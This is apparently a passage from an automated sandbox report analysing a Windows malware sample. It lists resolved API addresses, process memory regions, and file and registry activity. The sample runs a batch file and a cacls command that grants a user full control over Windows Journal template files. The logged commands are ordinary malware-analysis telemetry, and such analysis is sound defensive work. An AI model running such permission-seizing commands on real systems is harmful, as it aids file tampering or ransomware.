| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x74f59660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x74f5a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x74f5a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x74f587c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x74f58840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x74f57940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x74f59560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x74f669c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x74f66390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x74f81c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x74f668e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x74f66920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x74f66540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x776f5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x776f5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x74f826a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x776eda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x7770f190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x7770a200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x74f674f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x74f59fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x74f52d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x74f575a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x74f525e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x74f66870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x74f668c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x74f66900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x74f59700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x74f51b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77712570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x74f57920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77709920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x74f662a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x74f66590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x74f66860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x74f59680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x74f664a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x74f5a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x74f828e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x74f5a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x74f66020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x74f577b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x74f5fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x74f59a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x74f51ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x74f51da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x74f59930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x74f5a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x74f58770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x74f5fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x74f59fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x74f57910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x74f59a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x74f52dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x74f51d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x74f52b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x74f5a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x74f5a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x776ebae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x74f664f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x7756ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x7756fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x775695e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x77570680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x7756ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x7756f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x7756ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x7756ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x7756f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x775706c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x7756efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x7756f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x766dc6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x750dee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x750b55a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x750b57e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x750b9590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x750b0820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x750dfbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x76c838f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x76c9b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x76c9b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x76c87740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x76c974e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x76c9efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x76ca4ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x76c94580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x76c91540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x742f1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x742f1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x742f1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x74f5a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x74f5f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x74f57580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x74f59910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x74f66030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x74f65f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x74f65ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x74f5a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x74f5a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x776e40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x776dd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x776decf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x74f65720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x776de140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x776deb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77719990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77715540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77709dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x74f5a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x74f80a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x752c0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x74f5f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x74f5fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x74f81030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x74f5a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x74f814b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x74f5a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x74f816f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x74f59970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x75243c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x74f58710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x74f596e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-01-23 14:13:09 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #219: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #219 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Windows Journal\Templates\Shorthand.jtp" /E /G CIiHmnxMn6Ps:F /C |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:37, Reason: Child Process |
| Unmonitor | End Time: 00:03:40, Reason: Self Terminated |
| Monitor Duration | 00:00:03 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xed4 |
| Parent PID | 0x8e0 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
424
0x
75C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000160000 | 0x00160000 | 0x0017ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000160000 | 0x00160000 | 0x0016ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x00173fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000180000 | 0x00180000 | 0x00181fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000180000 | 0x00180000 | 0x00183fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001b0000 | 0x001b0000 | 0x001effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x0022ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000230000 | 0x00230000 | 0x00233fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000240000 | 0x00240000 | 0x00240fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000250000 | 0x00250000 | 0x00251fff | Private Memory | rw |
|
|
|
- |
| cacls.exe.mui | 0x00260000 | 0x00261fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x0029ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x004fffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x002a0000 | 0x0035dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000360000 | 0x00360000 | 0x0039ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003a0000 | 0x003a0000 | 0x003dffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000400000 | 0x00400000 | 0x004fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000500000 | 0x00500000 | 0x005cffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x005d0000 | 0x00906fff | Memory Mapped File | r |
|
|
|
- |
| cacls.exe | 0x01040000 | 0x01049fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001050000 | 0x01050000 | 0x0504ffff | Pagefile Backed Memory | - |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x742c0000 | 0x742e7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f3a0000 | 0x7f3a0000 | 0x7f49ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f4a0000 | 0x7f4a0000 | 0x7f4c2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f4c4000 | 0x7f4c4000 | 0x7f4c6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f4c7000 | 0x7f4c7000 | 0x7f4c7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f4ca000 | 0x7f4ca000 | 0x7f4ccfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f4cd000 | 0x7f4cd000 | 0x7f4cdfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #220: cmd.exe
237
0
| Information | Value |
|---|---|
| ID | #220 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c ""C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" "C:\Program Files\Windows Journal\Templates\Genko_1.jtp"" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:38, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:24 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xee8 |
| Parent PID | 0xa70 (c:\users\ciihmnxmn6ps\desktop\mngrxc.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
388
0x
A34
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x003f0000 | 0x0043ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000c60000 | 0x00c60000 | 0x04c5ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004c60000 | 0x04c60000 | 0x04c7ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004c60000 | 0x04c60000 | 0x04c6ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004c70000 | 0x04c70000 | 0x04c73fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004c80000 | 0x04c80000 | 0x04c81fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004c80000 | 0x04c80000 | 0x04c83fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004c90000 | 0x04c90000 | 0x04ca3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004cb0000 | 0x04cb0000 | 0x04ceffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004cf0000 | 0x04cf0000 | 0x04deffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004df0000 | 0x04df0000 | 0x04df3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004e00000 | 0x04e00000 | 0x04e00fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004e10000 | 0x04e10000 | 0x04e11fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04e20000 | 0x04eddfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004ee0000 | 0x04ee0000 | 0x04f1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004f20000 | 0x04f20000 | 0x04f2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004fc0000 | 0x04fc0000 | 0x04fcffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004fd0000 | 0x04fd0000 | 0x051fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004fd0000 | 0x04fd0000 | 0x050cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005100000 | 0x05100000 | 0x051fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005200000 | 0x05200000 | 0x0538ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x05390000 | 0x056c6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| cmdext.dll | 0x741b0000 | 0x741b7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f120000 | 0x7f120000 | 0x7f21ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f220000 | 0x7f220000 | 0x7f242fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f246000 | 0x7f246000 | 0x7f246fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f247000 | 0x7f247000 | 0x7f249fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f24a000 | 0x7f24a000 | 0x7f24cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f24d000 | 0x7f24d000 | 0x7f24dfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (165)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
22 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | - | type = file_type |
|
3 | |
| Open | STD_OUTPUT_HANDLE | - |
|
76 | |
| Open | STD_INPUT_HANDLE | - |
|
6 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
10 | |
| Write | STD_OUTPUT_HANDLE | size = 30 |
|
4 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 82 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 61 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 18 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 37 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 201, type = REG_NONE |
|
1 | |
